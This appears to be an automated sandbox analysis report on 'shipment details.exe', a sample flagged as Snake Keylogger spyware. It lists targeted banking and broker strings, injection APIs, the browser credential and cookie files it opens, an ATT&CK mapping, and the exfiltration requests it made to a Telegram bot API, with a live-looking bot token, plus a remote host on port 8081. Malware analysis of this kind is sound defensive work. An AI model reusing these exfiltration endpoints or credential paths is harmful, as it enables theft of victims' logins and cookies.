              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce87960e4dfa2<
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: shipment details.exe, 00000001.00000002.4518709296.0000000001126000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: C:\Users\user\Desktop\shipment details.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeCode function: 1_2_06BD9548 LdrInitializeThunk,1_2_06BD9548
              Source: C:\Users\user\Desktop\shipment details.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
              Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
              Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
              Source: C:\Users\user\Desktop\shipment details.exeProcess created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Users\user\Desktop\shipment details.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              DLL Side-Loading
              11
              Process Injection
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Email Collection
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Security Software Discovery
              Remote Desktop Protocol11
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Process Injection
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              3
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS31
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
              Obfuscated Files or Information
              LSA Secrets1
              Application Window Discovery
              SSHKeylogging15
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Timestomp
              DCSync13
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              shipment details.exe37%ReversingLabsWin32.Spyware.Snakekeylogger
              shipment details.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              188.114.97.3
              truetrue
                unknown
                api.telegram.org
                149.154.167.220
                truetrue
                  unknown
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    unknown
                    56.163.245.4.in-addr.arpa
                    unknown
                    unknowntrue
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            unknown
                            https://reallyfreegeoip.org/xml/8.46.123.33false
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://duckduckgo.com/chrome_newtabshipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://duckduckgo.com/ac/?q=shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgshipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmptrue
                                unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoshipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://api.telegram.org/botshipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                    unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://checkip.dyndns.orgshipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://chrome.google.com/webstore?hl=enshipment details.exe, 00000001.00000002.4520239872.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://www.ecosia.org/newtab/shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://varders.kozow.com:8081shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          unknown
                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20ashipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
